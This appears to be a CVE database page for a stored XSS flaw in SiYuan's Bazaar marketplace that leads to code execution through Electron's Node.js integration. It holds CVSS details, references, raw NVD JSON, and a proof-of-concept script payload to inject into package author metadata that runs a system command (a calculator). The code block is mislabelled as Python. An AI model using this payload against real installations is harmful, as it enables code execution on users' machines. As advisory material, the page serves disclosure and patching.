CVE-2026-44586

Description

SiYuan is an open-source personal knowledge management system. From 2.1.12 to before 3.7.0. SiYuan's Bazaar marketplace renders package author metadata from the public bazaar stage feed into HTML without escaping. In the desktop app this becomes stored XSS, and because SiYuan's Electron windows are created with nodeIntegration: true and contextIsolation: false, a successful payload can call Node.js APIs and execute code on the host. This vulnerability is fixed in 3.7.0.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SiYuan >= 2.1.12, < 3.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2026-44586: SiYuan Stored XSS to RCE -->
<!-- Inject this into the 'Package Author Metadata' field in Bazaar -->

<script>
  // Exploit Logic: Use XSS to execute system commands via Node.js
  // Requires: nodeIntegration: true, contextIsolation: false (Vulnerable Config)
  
  try {
    const { exec } = require('child_process');
    
    // Determine OS and execute appropriate command (e.g., open calculator)
    const cmd = process.platform === 'win32' ? 'calc.exe' : 'open -a Calculator';
    
    exec(cmd, (error, stdout, stderr) => {
      if (error) {
        console.error(`Execution Error: ${error.message}`);
        return;
      }
      console.log(`PoC Executed: ${stdout}`);
    });
  } catch (e) {
    console.log('Node.js integration not available or context isolated.');
  }
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44586
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44586
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44586/
[4] VulDB https://vuldb.com/cve/CVE-2026-44586
[5] https://github.com/siyuan-note/siyuan/security/advisories/GHSA-x6wf-w2rg-2gw9
[6] https://github.com/siyuan-note/siyuan/security/advisories/GHSA-x6wf-w2rg-2gw9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44586", "sourceIdentifier": "[email protected]", "published": "2026-05-14T19:16:37.727", "lastModified": "2026-05-14T21:22:56.313", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is an open-source personal knowledge management system. From 2.1.12 to before 3.7.0. SiYuan's Bazaar marketplace renders package author metadata from the public bazaar stage feed into HTML without escaping. In the desktop app this becomes stored XSS, and because SiYuan's Electron windows are created with nodeIntegration: true and contextIsolation: false, a successful payload can call Node.js APIs and execute code on the host. This vulnerability is fixed in 3.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-x6wf-w2rg-2gw9", "source": "[email protected]"}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-x6wf-w2rg-2gw9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}